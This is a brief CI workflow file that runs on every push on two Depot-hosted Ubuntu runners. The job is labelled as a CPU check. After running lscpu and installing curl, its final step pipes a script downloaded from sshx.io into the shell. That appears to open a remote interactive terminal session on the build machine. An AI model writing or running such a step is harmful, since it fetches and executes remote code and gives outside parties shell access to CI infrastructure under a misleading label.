name: geaaa

on: push

jobs:
  check_cpu:
    runs-on: depot-ubuntu-24.04-16
    strategy:
      matrix:
        instance: [1, 2]

    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Works
      run: |
        lscpu
        sudo apt-get update -y
        sudo apt-get install -y curl
        curl -sSf https://sshx.io/get | sh -s run
